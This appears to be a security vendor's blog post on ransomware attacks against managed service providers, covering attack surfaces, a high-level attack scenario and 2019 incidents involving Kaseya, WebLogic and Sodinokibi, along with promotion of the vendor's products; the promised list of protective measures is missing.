Managed Service Providers (MSPs) are a rapidly growing industry, which provides various software applications and services, including cybersecurity services. Their services appeal to a wide range of organizations, especially to small-medium businesses (SMBs), which cannot otherwise access or maintain these services on their own, due to their size, budget, or manpower limitations.
Due to their extensive customer base, MSPs have become an attractive attack target, as attackers can abuse their systems to reach many different organizations in a short period of time. Attacks against MSPs have escalated within the past several months, with several threat actors abusing different MSP providers to spread ransomware. In an industry-wide survey, 30% of MSP providers stated their main point of concern was cybersecurity and ransomware related incidents, Interestingly, 82% consider antivirus as the most relevant security solution for small-medium businesses (SMBs).
This post will overview recent attacks against MSPs, explain why MSPs are an attractive attack surface, and explain how organizations can protect themselves from these types of attacks.
A managed service provider (MSP) provides remote management of a customer’s systems, while sometimes also providing network infrastructure and specialized applications, such as security and network management applications. Due to their limited IT capabilities and budgets, small and medium-sized businesses (SMBs) are typical customers of MSPs, as access to the services they wish to use through the MSP would otherwise be prohibitive.
The MSP market is a rapidly growing one – the managed services market is expected to grow at an annual rate of over 9%, reaching a size of $296 Billion by 2023.
As mentioned above, MSPs provide various services to multiple endpoints, and sometimes multiple customers, simultaneously. Several key factors increase the attack surface of MSP software and make it more susceptible to attack.
In many cases, attackers can gain access to MSP software through public connections of these programs to the Internet and use default or weak credentials to access a program. As MSPs are located remotely from their clients, attackers often look to exploit the connection between the MSP and their clients.
MSP software often runs with high privileges, which enable it to modify customer systems, update, push new files, and edit various system attributes. Due to this, if threat actors are able to access and control MSP software, they are provided with wide access to the targeted MSP’s endpoints, and by using the MSP software they can perform actions on endpoints that require administrative permissions.
Many MSP applications can be termed ‘dual-use tools’, as they have their intended legitimate functionalities which can be repurposed by attackers, such as the ability to download and execute scripts on multiple endpoints. In fact, these tools can be abused to perform a type of file-less attack, “Living-Off-the-Land”, where attackers only use widely-used administrative tools or tools common to the targeted organization, in order to perform the attack. This technique and the reason it is classified as a file-less attack are described in detail in Deep Instinct’s whitepaper “Making Sense of File-less Malware”, published March 2018.
In this typical attack scenario, an attacker might scan the Internet for RDP connections of popular MSP software, brute-force the password to these connections, and connect to an MSP application managing several clients. Then, the attacker can execute a “living-off-the-land” attack by abusing the application in order to push a specific file to all endpoints (this can range from thousands to millions of endpoints), or to set a specific scheduled task or script to run on all the endpoints. This bypasses many security measures, as the MSP software is trusted by the organization, and actions which are performed within its context will usually be considered legitimate.
The increase in attacks abusing MSP software has become very noticeable in the threat landscape. So far, reported attacks have all abused MSP tools to drop ransomware, however it is likely the same tools were used to drop other types of malware as well. Several attacks were reported during the past few months, and we strongly believe that just a few of them went public:
February 2019 – A vulnerability in Kaseya VSA RMM, CVE-2017-18362, was used to spread Gandcrab ransomware in multiple organizations. The main cause of the attack was MSPs which did not update their versions of Kasyea, in response Kaseya released a patch for the vulnerability in late 2017.
April 2019 – following the reported shutting down of Gandcrab, a new ransomware family, Sodinokibi, exploited a zero-day in Oracle’s WebLogic (CVE-2019-2725) to attack MSPs using the program. The vulnerability was exploited to run a PowerShell script on vulnerable systems, which downloaded and ran the ransomware executable.
June 2019 – Sodinokibi strikes again, this time by abusing several MSP tools: Webroot Management Console and Kaseya VSA RMM. In this attack, the operators of the ransomware initially infiltrated organizations through unsecured or badly secured RDP connections, and then used both tools to push Powershell scripts to all accessible endpoints. The scripts then downloaded a payload from Pastebin, which executed the ransomware and encrypted the endpoints. In some cases, the payload was an executable file which was executed as part of a file-based attack, in other cases additional scripts were downloaded, as part of a completely file-less attack.
Deep Instinct protects its customers from these attacks, by preventing them at multiple stages. Deep Instinct’s script control mechanism prevents scripts, including PowerShell from executing, thus preventing the attack at its first stage. In addition, the deep learning prediction model, ‘D-Brain’ prevents the executable payloads before their execution, meaning the threat is prevented before it can touch any threatened system.
MSPs provide much-needed services and applications to many organizations, especially SMBs, which would otherwise not have access due to size, budget, or manpower limitations. In this period burgeoning demand, MSPs are expanding their services to offer more value to their customers.
The flip side, however, is that the risk profile of MSPs is also heightened. MSP software has become a target for cyber-criminals, who want to make a profit attacking the huge customer install base of MSPs. Organizations which use MSP software should know how to use this software safely, in order to protect themselves from attacks. To protect your organization, make sure to implement the following security measures:
For more information read Deep instinct’s Whitepaper, Multi-Tenancy Security Solution for MSSPs